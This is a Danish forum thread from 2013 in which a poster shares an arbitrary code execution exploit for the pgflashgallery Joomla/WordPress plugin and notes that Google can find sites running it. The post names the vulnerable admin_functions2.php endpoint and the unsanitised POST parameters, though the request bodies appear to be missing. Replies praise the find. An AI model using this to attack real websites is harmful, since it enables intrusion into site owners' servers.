[exploit] pgflashgallery arbitrary code execution
|
17-07-2013, 02:24
|
|||
|
|||
[exploit] pgflashgallery arbitrary code execution
pgflashgallery er et Joomla/Wordpress plugin udviklet af http://www.photo-graffix.com.
Heldigvis er det her plugin ikke saerlig udbredt. Google kan dog finde nogle sider, der bruger det. Exploit: Kode: POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1 Vuln. code: PHP kode: $newop = $_POST['newop']; For at slette filen igen kan flg. POST request bruges: Kode: POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1 Vuln. code: PHP kode: $cart_file = $_POST['cart_file']; |
|||
17-07-2013, 13:33
|
|||
|
|||
RE: [exploit] pgflashgallery arbitrary code execution
Nice. Jeg har ikke testet det, men det ser da ganske godt ud.
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick |
|||
17-07-2013, 14:14
|
|||
|
|||
RE: [exploit] pgflashgallery arbitrary code execution
is it your sonny? dig der engang var på irc?
anyways fint fund. (: |
|||
18-07-2013, 11:04
|
|||
|
|||
RE: [exploit] pgflashgallery arbitrary code execution
Nej, det maa vaere en anden :)
|
|||
|
User(s) browsing this thread: 1 Gæst(er)